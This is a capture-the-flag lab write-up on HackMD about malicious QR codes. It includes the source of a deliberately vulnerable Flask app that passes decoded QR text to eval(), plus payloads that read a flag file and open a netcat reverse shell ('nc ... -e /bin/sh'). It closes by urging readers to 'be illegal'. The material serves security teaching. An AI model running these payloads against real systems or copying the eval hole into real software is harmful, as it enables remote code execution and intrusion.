# Hackwekend Session 0 - QRCode Vulnerabilities (Malicious QRCode gain access to reverse shell level) ###### tags: `vulnerable` `tutorials` `ctf` `research` ## Resource: - [QR Codes Exploitation: How to Mitigate the Risk?](https://blog.beaconstac.com/2021/06/qr-codes-exploitation/#:~:text=One%20of%20the%20most%20common,scan%20the%20Code%20and%20pay.) - [Create Malicious QR Codes to Hack Phones & Other Scanners](https://null-byte.wonderhowto.com/how-to/create-malicious-qr-codes-hack-phones-other-scanners-0197416/) - [Think before you scan: How fraudsters can exploit QR codes to steal money](https://www.welivesecurity.com/2022/02/04/think-before-scan-how-fraudsters-exploit-qr-codes/) - [Qrljacking](https://owasp.org/www-community/attacks/Qrljacking) *So what kind of technology become grow up in COVID19 pandemic and became popular method used to on during terrible time is* **QRCode :thinking_face:** So i have couple question about QRcode like: - What the activity QRcode are doing during scan process ? - It just normal process or we can make it becomes more dangerous, infection or normaling gain acces, isn't it ? - Do we can control all of thing like computer through scan QRcode ? --> So that one is reason why kind of thing which i want to exploit ## Some a real information - A recent research report on consumers revealed that **34% of respondents** have zero privacy, security, financial, or other concerns while using QR Codes. - Since any kind of malware or phishing links in QR Codes pose significant security risks for both enterprises and consumers, stringent security measures should be considered to mitigate the risk.![](https://i.imgur.com/dy8xvvl.png) ## The target :point_down: **Scenerio**: Because of not understanding from people with QRcode can make this one becomes juicy target for hacker. So basically, The work of us is using basic somekind `QRGen` and make the scanner on victim like server or any kind of that like mobile phones, hardware, ... know that payload for malicious can do some kind of that with one. And yet thinks about it, we can get full control of that. :fire: *But as first, try to know how to activity of QRcode and which type does target have ?* ## So what kind i do with malicious QRcode ### What are QRcode ? - QR codes are machine-readable data formats that are useful for anything that needs to be scanned automatically. - Before QR codes, there were several other formats called linear barcodes, which also stored data in a way that was easy for machines to read. ![](https://i.imgur.com/bryWboM.png) - Many different types of linear barcodes exist, they aren't able to store a lot of information. Applications like shipping and automobile manufacture required a standard that would hold more data. **The answer to the limitation of linear barcodes was 2D barcodes**, which offer more storage resistance to having physical damage affect the information contained within.![](https://i.imgur.com/1R69Fvt.png) - So we got declare for `AZcode` like image above. `Aztec code` is a 2D, or matrix, machine-readable code that is similar in many ways to a QR code and can hold more information than a linear barcode. - Other types of 2D barcodes can contain an extremely dense amount of data. The `PDF417` format found on the back of most drivers licenses in the United States, for example, can encode up to 1800 ASCII characters.![](https://i.imgur.com/jpL8yHV.png) ### What kind i do with that - Nowaday, QRcontain be encoded with huge amount of character and it will do a lot of thing but somekind i can take advandge of that to create some fascinating application of QR codes like share connect wifi like `WIFI:S:<SSID>;T:<WPA|WEP|>;P:<password>;H:<true|false|>;` - Which that example above we can imaginary how the hacker using that to hack with generate that QRcode they can do so much vulnerability (Posion from web app) like * SQL Injections * XSS * Command Injection * Format String * XXE * String Fuzzing * SSI Injection * LFI / Directory Traversal ## CyberCrime can cause by QRcode - Redirect you to a malicious website to steal sensitive information - Download a malicious file on your device - Trigger actions on your device - Divert a payment or make requests for money - Steal user identity or access to an application (**Target do in this Lab**) ## Tips to Prevent * Before scanning a QR code, check that it has not been tampered with; for example, verify that it doesn’t cover up another QR code. * Refrain from scanning randomly found QR codes or codes in unsolicited messages. * Exercise the same caution with the codes as when handling links or attachments in emails or messaging apps. * Be very careful when it comes to using a QR code to pay a bill or conduct another kind of financial transaction. Consider using another payment option. * Disable the option to perform automatic actions when scanning a QR code, such as visiting a website, downloading a file, or connecting to a Wi-Fi network. * After scanning, look at the URL to check that it’s legitimate. Even so, it may often be better to avoid inputting your login or personal information on a site you’ve landed on via a QR code. If something feels off, open a browser and type the URL yourself. * Do not share QR codes containing sensitive information, such as those used to access apps or those included in documents and health certificates. * When generating a QR code, use a reputable service. Such a service can also verify that the QR is genuine and performs the desired action. * Keep your apps up-to-date and use security software. # Lab Time > So after time to build a lab and it was done. So i prefer to coming back and talk about the progress when building it and what should we do with malicious qrcode to gainning access to victim *Like you know i am a CTFplayer, therefore i try to make vulnerability in like CTFchallenge. It can be easy for anyone want to approach* ## Language and Package for start - Python `(Main language)` - Flask `(Web framework)` - qrtool `(Lib for play with qr)` - PIL `(Lib for image progressing)` - pyzbar `(Lib for play with qr)` --> That was enough to me for building this challenge ## The Structure ![](https://i.imgur.com/zcfALM4.png) - Basic structure with app for of function of website - Templates for storage html ==> Help to redirect by flask - Static contain images and script if u want but it not need now ## Detail source code ``` #! app.py from flask import Flask, render_template, request, make_response, redirect, flash from pyzbar.pyzbar import decode from PIL import Image import random def decodeQR_code(image): decodeQR= decode(Image.open(image)) return decodeQR[0].data.decode('ascii') def isvalidimage(image): im = Image.open(image) w, h = im.size if w != h: return False else: return True app = Flask(__name__) app.secret_key = "secret key" @app.route('/') def index(): return render_template('index.html') @app.route('/auth') def authentication_doc(): url_ran = ['https://www.freecodecamp.org/news/how-to-authenticate-users-in-flask/', 'https://realpython.com/using-flask-login-for-user-management-with-flask/', 'https://testdriven.io/blog/flask-spa-auth/', 'https://fiverr-res.cloudinary.com/images/t_main1,q_auto,f_auto,q_auto,f_auto/gigs/129737214/original/49d95bd5e47653963b30ed02ca1aec87174a83e5/create-professional-qr-codes.png'] pick = random.choices(url_ran, cum_weights=(40,50,20,0.000000000001), k=1)[0] return redirect(pick) @app.route('/qr', methods=['GET']) def QRoauth(): return render_template('qrcode.html') @app.route('/qr', methods=['POST']) def QRsubmit(): if 'file' not in request.files: flash('No file part') return redirect('qrcode_submit.html') file = request.files['file'] if file.filename == '': flash('No image selected for uploading') return redirect('qrcode_submit.html') if file: if isvalidimage(file): decode_string = decodeQR_code(file) print(decode_string) if decode_string == "": flash('submit complete, how to you know wat your blob ? think what you got and try again') return render_template('qrcode_submit.html') else: flash('submit complete, what a good think? qr here you are ' + eval(decode_string)) return render_template('qrcode_submit.html') else: flash('think far about the image you submit, it should be had same between width and height') return render_template('qrcode_submit.html') @app.route('/gow') def gow(): return render_template('gow.html') app.run(debug=True) ``` ``` #! templates/gow.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>godofwar</title> </head> <body> <img src="https://cdn-img.thethao247.vn/origin_768x0/storage/files/haibui/2022/11/09/sieu-pham-god-of-war-ragnarok-chinh-thuc-ra-mat-215580.png" style="display: block;margin-left: auto;margin-right: auto;"> <p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p> </body> </html> ``` ``` !# templates/index.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>HackerSide</title> </head> <body> <div style="display: flex;justify-content: center;align-items: center;text-align: center;min-height: 50vh;"> <h1 style="display:inline;text-align: center;"> <code>This is the manual book of website? What you think about that ????</code></h1> </div> <div style="display: flex; align-items: center; font-size: large; place-content: space-evenly;"> <tr> <li><code><a href="/auth">Authentication method</a></code></li> <li><code><a href="/qr">Submit</a></code></li> <li><code><a href="/gow">God of war</a></code></li> </tr> </div> </body> </html> ``` ``` !# templates/qrcode_submit.html <!Doctype html> <title>Hey QRcode submit</title> <p> {% with messages = get_flashed_messages() %} {% if messages %} <ul> {% for message in messages %} <li><code>{{ message }}</code></li> {% endfor %} </ul> {% endif %} {% endwith %} </p> ``` ``` #! templates/qrcode.html <!DOCTYPE html> <title>Hey, QR submit check the out</title> <h2 style="text-align: center;display:flex;justify-content: center;">Select a file to upload</h2><br> <div style="display: flex;justify-content: center;align-items: center;text-align: center"> <form method="post" action="/qr" enctype="multipart/form-data"> <dl> <p> <input type="file" name="file" autocomplete="off" required> </p> </dl> <p> <input type="submit" value="Submit"> </p> </form> </div> ``` - This is bunch of code for my processing and target i want to expect but target about the vulnerable with malicious qrcode - So focus on `app.py` because it contains me idea for creating that `trick` ![](https://i.imgur.com/vmMxcPE.png) - So as first we have 2 of function for check and decodeqr and so it work exactly i want - Nevermind what it to much but somekind it will give u idea in submitting - So i need to `app.secret_key = "secret key"` - set about secret key to return to view because it try to pass some unique in Flask - helpful :smiling_face_with_smiling_eyes_and_hand_covering_mouth: ![](https://i.imgur.com/dtYayBL.png) - So with that dir, i just make the people can try to lucky for get the idea of challenge but it have 0.000000000001/(40+50+20+0.000000000001) can occur so it hard to try this :smile: ![](https://i.imgur.com/oWAHohk.png) - So with that directory is keep to suggest the method to exploit this challenge so we can reach the gow.html ![](https://i.imgur.com/FZMYAtv.png) so very basic but if you careful you can get the ROT13 strings on the hidden value can see it on the web `<p hidden>This is why you need to read a metadata concept of ragnarok: uggcf://ra.jvxvcrqvn.bet/jvxv/DE_pbqr</p>` so drop it rot13 and decrypt it and that could i want to talk `https://en.wikipedia.org/wiki/QR_code` - But it just method to understand, reach the submit form u need to know that is form to submit qrcode image so how to exploit this reach next step ## Exploit ``` @app.route('/qr', methods=['GET']) def QRoauth(): return render_template('qrcode.html') @app.route('/qr', methods=['POST']) def QRsubmit(): if 'file' not in request.files: flash('No file part') return redirect('qrcode_submit.html') file = request.files['file'] if file.filename == '': flash('No image selected for uploading') return redirect('qrcode_submit.html') if file: if isvalidimage(file): decode_string = decodeQR_code(file) print(decode_string) if decode_string == "": flash('submit complete, how to you know wat your blob ? think what you got and try again') return render_template('qrcode_submit.html') else: flash('submit complete, what a good think? qr here you are ' + eval(decode_string)) return render_template('qrcode_submit.html') else: flash('think far about the image you submit, it should be had same between width and height') return render_template('qrcode_submit.html') ``` - So this is what is do so if you click ![](https://i.imgur.com/oSfzmML.png) - So if you find enough to bypass this u know it just accept qrcode ![](https://i.imgur.com/ZTHAGyJ.png) - So try upload the image type qrcode and so how to generate it - easily can find it on [QRGen](https://github.com/h0nus/QRGen), so it contain many wordlist u can generate and try to gain access this web. But easily like i talk flag is flag and it just simple with it - So if you submit on write payload, u got what you want and why we get that because it code i u eval() function the powerful function in python and any programming language. So many type to try bypass this but it just very easy question so try `open('flag').read()` to generate the qr code with it like ![](https://i.imgur.com/yt8o5P2.png) - But another way with that kind we can gain access to have shell of website so try to generate qrcode such as `__import__('os').system('nc 0.0.0.0 9999 -e /bin/sh')` and you whill got you want this PoC is upgrade for my progressing and wat i can reach to exploit the basic challenge ![](https://i.imgur.com/UOd4BAe.png) - The result if we submit is flag and shell of website ![](https://i.imgur.com/YIfExIu.png) ![](https://i.imgur.com/JS1PMoY.png) ![](https://i.imgur.com/qUCjvcQ.png) ![](https://i.imgur.com/6KUpMoV.png) ![](https://i.imgur.com/0lji572.png) ![](https://i.imgur.com/IiWulsb.png) ## Happy hacking and be illegal for your purpose :smile:
Last changed by  
XeusNguyen
Stay humble and enthusiastic with passion. Follow me more on: https://wiki.xeusnguyen.xyz
1857

Read more

Hackwekend Session 5 - Cloud Security (AWS IAM Policy)

First solve

5/5/2024
Hackwekend Session 6 - Cloud Security (Network and Red Team)

Link to challenge: https://k8slanparty.com/

5/5/2024
Deploy your alert with Grafana by Terraform and some common error with K8s

So hi there, continue of my mood for writing blog, i will release something to help you define the alert on grafana just use by terraform and managing them

4/25/2024
Flag Hoarding - mapleCTF 2022 - [misc/forensic]

Description: Damning internal communications within Maple Bacon have been leaked, revealing a plot to steal the flags of other teams at the upcoming International Flag Admirers’ Conference. You’ve gotten a hold of the leaked files. Find information that could help uncover the identity of the whistleblower.

12/11/2023
Read more from XeusNguyen
Published on HackMD